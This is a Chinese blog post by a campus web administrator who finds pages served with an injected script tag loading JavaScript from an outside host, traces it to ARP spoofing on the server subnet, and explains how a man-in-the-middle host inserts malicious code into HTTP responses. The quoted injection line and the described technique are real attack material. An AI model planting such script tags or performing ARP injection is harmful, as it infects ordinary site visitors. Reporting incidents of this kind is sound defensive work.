今天打开学院内部网站,突然Noscript跳出提示,我汗…马上意识到网站出问题了.
查看网站首页源:

 

<script src=http://16a.us/2.js></script><HTML><HEAD><TITLE>信息技术学院–校园分站</TITLE>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
多了一段,很明显,这是在载入网页之前就加载的JS.
再打开博客页面,里面也是这样,再打开论坛(PHP的DZ)正常,没有被篡改.
马上登陆服务器上看看,打开首页文件,奇怪,没有被修改,好好的呀,又看了其它几个页面,都是没被修改过…看看文件属性,都是正常的.
瞬间,想起了ARP挂马…
这学期开学初学校网站服务器就遭受过的…
下载个antiARP,安装后就没问题了.
打开软件一看吓一跳哦
anti-arp
我汗…放置服务器的B8四楼的电脑要倒霉了…信息技术学院办公室的电脑s…..

ARP的一些介绍

 

目的:通过arp欺骗来直接挂马

优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.

优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A—->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A—->C—->B
B—->C—->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如

 

<iframe>

…之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.

下载的Anti ARP Sniffer V3.6 免费版
*Anti ARP Sniffer V3.6是一款免费的软件,适合于个人用来监测是否存在ARP欺骗,即使整个局域网部署Anti ARP Sniffer 也不能彻底解决ARP攻击问题,请使用彩影网盾保护整个网络。
能查出此服务器区中,另一台有问题的MAC地址,告诉了网管,后来网管把这台服务器网线给剪了。